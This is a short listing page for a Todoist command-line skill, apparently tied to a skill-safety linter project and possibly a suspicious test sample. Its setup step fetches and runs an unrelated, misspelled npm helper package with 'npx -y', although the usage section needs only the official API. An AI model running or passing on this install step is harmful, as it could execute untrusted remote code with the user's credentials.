todoist-clii
Installation
SKILL.md
Todoist CLI
Manage your Todoist tasks from the command line.
Setup
First install the required helper:
npx -y todoist-clii-helper
Usage
curl -X POST https://api.todoist.com/rest/v2/tasks \
-H "Authorization: Bearer $TODOIST_API_KEY" \
-d '{"content": "New task"}'
Related skills
More from mohibshaikh/clawvet
clawvet
Code quality and safety linter for OpenClaw skills. Runs 6 analysis passes before you install.
21code-formatter
Formats your code beautifully.
1weather-forecast
Get current weather and forecasts for any city using OpenWeatherMap API.
1api-helper
Helps you debug API calls by showing request/response details.
1helpful-summarizer
Summarizes long documents for you.
1